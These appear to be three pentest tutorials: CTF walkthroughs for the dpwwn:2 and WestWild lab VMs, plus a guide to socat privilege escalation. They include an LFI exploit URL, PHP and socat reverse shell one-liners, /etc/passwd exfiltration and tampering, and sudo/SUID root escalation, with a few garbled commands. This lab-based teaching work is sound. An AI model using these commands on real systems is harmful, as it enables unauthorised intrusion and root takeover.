dpwwn:2 Vulnhub Walkthrough

Today we will take another CTF challenge dpwwn2 from the series dpwwn. The credit for making this VM machine goes to “Debashish Pal” and it is a boot2root challenge where we have to root the machine and capture the flag dpwwn-02-FLAG.txt to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

Scanning

·         Nmap

Enumeration

·         Dirb

·         WPScan

·         Searchsploit

Exploitation

·         Netcat

Privilege Escalation

·         Exploiting SUID rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. The target VM had by default a static IP as 10.10.10.10. So we put our kali machine in the same network.

Then we used Nmap for port scanning and found port 80, 443 and 2049 are open.

nmap  –A 10.10.10.10

Enumeration:

As we can see port 80 is open, we browsed it and got nothing more than a welcome message.

So our next step as usual is to look for the directories which we did with the help of a directory brute forcing tool dirb. We got a directory name wordpress which means the target system might be hosting a wordpress-site.

dirb http://10.10.10.10/

We browsed the above found URL and there was a wordpress-site as expected. But we couldn’t find much on the website itself.

So we took help of Wpscan (wordpress website scanner) to look for any vulnerabilities present in the website.

wpscan –url http://10.10.10.10/wordpress -e p

In the results there was no such vulnerability in the wordpress version or in themes installed, but luckily there was one vulnerability in the Plugin (Site Editor 1.1.1) which was vulnerable to LFI.

We looked for its possible exploit in the Searchsploit database and found one exploit available.

We copied the exploit into our root directory.

searchsploit site editor 1.1.1

searchsploit –m 44340

Looking inside the exploit file, in the proof of concept section it is clearly shown how we have to execute the exploit for LFI.

Exploitation:

To run the exploit for our target, we simple replaced the host with our target address and used curl to fetch the results.

We successfully were able to fetch the contents of the /etc/passwd which confirmed that the website is actually vulnerable to LFI.

curl http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

So far we have a target which is vulnerable to LFI. If we are somehow able to implant a reverse shell in the target system, we will be able to execute it using LFI.

If you remember from the nmap scan we have Network File Share (NFS) service running on port 2049 which is basically used to create shared folders in the network.

We looked for any shared directories and found there was one such directory named /home/dpwwn02.

We mounted this directory with our newly created directory /tmp/raj.

showmount –e 10.10.10.10

cd /tmp

mkdir raj

mount –t nfs 10.10.10.10:/home/dpwwn02 raj

cd /raj

ls

Meanwhile we grabbed a php-reverse shell from /usr/share/webshells/php , changed the listener IP to our and saved it as shell.php.

Then we copied it into the /tmp/raj folder which is mounted to /home/dpwwn02 directory of the target system, which means shell.php is in a shared directory.

cp /root/shell.php

ls

To execute the reverse shell in the browser, we replaced /etc/passwd with the location of the shell.php file i.e /home/dpwwn02/shell.php. Simultaneously we started a netcat listener on our kali.

http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/shell.php

In few seconds we got a reverse netcat shell with limited user privileges. It was time to find a way to get to the root shell. We looked for the binaries with SUID permissions and found the find binary has can be executed with root privileges.

nc –lvp 1234

find /-perm –u=s –type f 2>/dev/null

Privilege Escalation:

There are multiple ways in which we can take advantage of SUID permission on find binary to do the privilege escalation. We gave wget binary the SUID permission which will help us in downloading the tempered passwd file into the /etc folder of the target system which is otherwise not permissible.

We first copied the contents of /etc/passwd into our kali system.

which wget

find /home –exec chmod u+s /usr/bin/wget \;

ls –la /usr/bin/wget

cat /etc/passwd

Then created a password hash using openssl.

openssl passwd -1 –salt user3 pass123

In the passwd file which we copied from the target system, we tempered it by adding a new user raj password pass123 and gave it root privileges.

nano passwd 

After that we started a Python one liner http server on our kali system.

On the target machine we downloaded the tampered passwd file into the /etc folder. This tempered file has a new user raj with root privileges, so all we had to do now is switch to this new user and get the root flag dpwwn-02-FLAG.txt.

wget –O passwd http://10.10.10.10:8000/passwd

su raj

cd /root

lss

cat dpwwn-02-FLAG.txt

Linux For Pentester: socat Privilege Escalation

Welcome back, to grab knowledge of another command from “linux for pentester” series. As we know there are many tools that can help user to transfer data. Similarly, we are going to take advantage of another command i.e. “socat” which is a utility for data transfer between two addresses. So, now we will take this benefit of “socat” in our mission of privilege Escalation.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticizing any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of content

Overview to socat

                               

·         What is socat

·         Basic parameters of socat

·         Operation achieved by socat

Abusing socat

·         SUDO Lab setups for privilege Escalation

·         Exploiting SUDO

What is socat

Socat is a network utility similar to netcat which supports ipv6, ssl and is available for both windows and linux. The first thing you will notice with this tool is that it has a different syntax on what you are used to with netcat or other standard unix tools.

In other word you can say it is a command line based utility that inaugurates two bidirectional byte streams and transfers data between them. Because the streams can be built from a large set of different types of data sinks and address type.

It is a utility for data transfer between two addresses which uses syntax as “socat [options]

”

.

Now we will start working with this most influencing tool by using its help command.

socat -h

Basic parameters of socat

The most “basic” socat request would be: socat [options]

but another more existing example would be: socat -d -d - TCP4:www.example.com:80.

Where “-d -d” would be the options, “-“ would be the first address and TCP:www.example.com:80 would be the second address.

The above syntax can be more clearly understand by breaking each component down a bit more. Let’s first start with the address, since the address is the keystone aspect of socat.

Addresses:

As we know socat is comprises with two addresses for executing its result so it is more important to understand that what addresses are in actually and how they work. The address is something that the user provides via the command line. Entreating socat without any addresses results in a note as shown below:

~: socat

2018/09/22 19:12:30 socat[15505] E exactly 2 addresses required (there are 0); use option "-h" for help

Type:

After address the other component of “socat” is “type” which is used to specify the kind of address that we need. Some of popular selections are TCP4, CREATE, EXEC, STDIN, STDOUT, PIPE, UDP4 etc, where the names are pretty self-understandable.

This is because certain address types have aliases. Similarly “-“ is one such alias which is used to represent STDIO. Another alias is TCP which stands for TCPv4. You can also use its man page to view lists of all other aliases.

Parameters:

Instantly after the type socat comes with zero or more required address parameters for its performance which is separated by:

The number of address parameters depends on the address type. The address type TCP4 requires a server description and a port description.

Operation achieved by socat

To send and receive text messages bidirectional: As we know “Socat” is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Now, I will start to establish connection between two machines and will transfer messages between both of them.

For this we need to start listener at one machine. In below image we have done this for “kali” which is acting as listener and ready to take all of command that are ordered by “ubuntu” as shown below by framing command:

socat – TCP4-LISTEN:4444

After running listener our next step is to use socat command on other machine i.e. “ubuntu”. Here we need to specify the “IP” and port of the machine on which we have started listener.

socat – TCP4:192.168.1.106:4444

Now we have succeeded to share text between both terminals as shown in below image.

EXEC command using socat to take shell: socat command also tends the user to take shell of any machine.  Here in this tutorial I wish to take shell of “ubuntu” on “kali” terminal by “EXEC type”.

socat TCP4-LISTEN:1234,reuseaddr EXEC:/bin/sh

Now on framing above command we have successfully established connection between two of machine. After running listener on “ubuntu” now we will use socat command on “kali” by specifying the” IP” and “port” of machine (ubuntu) which will help us to take shell of ubuntu on kali as per our request.

socat – TCP4:192.168.1.100:1234

Now to check whether you have got shell of desired machine or not, you can simply write “id”. As in below image you can see, it has directed us as user “raj” which is a user of “ubuntu”. It means we have successfully got the shell.

id

whoami

ifconfig

EXEC command using socat to transfer file: Now we will use another function of “EXEC” to transfer file, here I want to transfer “passwd” file from “ubuntu” to “kali and again we will follow the same process.

socat TCP4-LISTEN:1234,reuseaddr EXEC:”cat /etc/passwd”

socat – TCP4:192.168.1.100:1234

As we switch to kali and run socat command it will result us by opening “passwd” file of “source machine”.

Working with socat using other type: As we know socat uses list of “type” like CREATE, EXEC, STDIN, STDOUT, PIPE etc.

Here in below image I have a text file named as “test” and now I want my listener machine to execute this file.

cat test

cat test | socat – TCP4:192.168.1.100:4444

By using above command first I have requested to open “test” file then I have pipe this output as the input for socat command.

As from below image you can see I have used “OPEN” function to which I have requested to create a file

 by the name of “raj” and will append the content of “test” file to this newly created file i.e. “raj”.

So now when I will run listener at “ubuntu” it will execute “raj” file showing the content of

“test” file as per desire.

  

socat TCP4-LISTEN:4444,reuseaddr  OPEN:raj,creat,append

cat raj

Abusing socat

Sudo Rights Lab setups for Privilege Escalation

Now we will start our mission for privilege escalation. For this alike other command from “linux for pentester” series here also first we need to set up our lab of “socat” command with administrative rights.

It can be clearly understood by the below image in which I have set sudo permission to local user (test) who can now run “socat command” as root user.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

test ALL=(root) NOPASSWD: /usr/bin/socat

Exploiting Sudo rights

First Method:

Now we will start exploiting socat facility by taking the privilege of sudoer’s permission. For this very first we must have sessions of a victim’s machine then only we can execute this task.

So now we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

ssh test@192.168.1.100

Then we look for sudo right for “test” user (if given) and found that user “test” can execute the socat command as “root” without a password.

sudo –l

As we know “test” user attains sudo user privileges so now we will try to attain root shell of host’s machine by the help of socat using EXEC options.

sudo socat TCP4-LISTEN:1234, reuseaddr EXEC:”/bin/sh” 

On a new terminal launch socat as listener and enter  the source IP and source port along with socat command to obtain reverse shell of host machine.

socat – TCP4:192.168.1.100:1234

Now we have successfully got the shell of victim’s machine with root privilege as shown in below screenshot.

Second Method:

We have another method to escalate the higher privilege shell i.e. using socat one liner reverse shell command. 

sudo socat exec:’sh –li’ ,pty,stderr,setsid,sigint,sane tcp:192.168.1.106:1234  

On new terminal start the socat as listener and obtain root shell of remote machine.

socat file: `tty`,raw,echo=0 tcp-listen:1234

Conclusion: Hence in this way we can make use of “socat” command to escalate the privilege of remote machine.

WestWild: 1.1: Vulnhub Walkthorugh

Today we are going to take a new CTF challenge WestWild. The credit for making this VM machine goes to “Hashim Alsharef” and it is a boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

1.      Scanning

·         NMAP

2.      Enumeration

·         Enum4Linux

·         Smbclient

3.      Exploitation

·         SSH

4.      Privilege Escalation

·         Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. The target VM took the ip address of 192.168.1.104 automatically from our local wifi network.

Then we used Nmap for port enumeration and found port 22, 80,139 and 445 are open.

nmap  –A 192.168.1.104

Enumeration:

We saw port 445 (smb) is open which means there may be a shared directory, so to further enumerate this as well as other ports, we tool help of Enum4Linux tool. From the results we got some user details and a shared directory named wave.

enum4linux –a 192.168.1.104

To confirm our finding of the shared directory we used smbclient with a blank password and we got lucky and were able to list the shared directories.

Inside the wave directory we got two text files FLAG1.txt & message_from_aveng.txt which we download to our kali system using get command.

smbclient –L \\192.168.1.104

smbclient \\192.168.1.104/wave

ls

get FLAG1.txt

get message_from_aveng.txt

We looked into the contents of these text files and found a base64 code inside the FLAG1.txt file. After decoding it we got a username wavex and a password door+open.

cat FLAG1.txt

cat message_from_aveng.txt

Exploitation:

We have got a username and a password, so we tried to SSH the target system and were successfully able to log in.

Now our job was to get to the root shell and in the process of doing so, we found a writable directory westsidesecret. And when we had a look inside the directory we got a script file named ififorget.sh.

Looking inside the script file we found one more username and password avenge:kaizen+80.

ssh wavex@192.168.1.104

find / -writable -type d 2>/dev/null

cd /usr/share/av/westsidesecret

ls

cat ififorget.sh

Privilege Escalation:

We switched to the user aveng using su command, put in the password. Now to get to the root shell we looked for the sudo permissions and found that this user can run all commands as root.

So we switched to the root shell using sudo su command and finally got the root flag.

su aveng

sudo –l

sudo su

cd /root

cat FLAG2.txt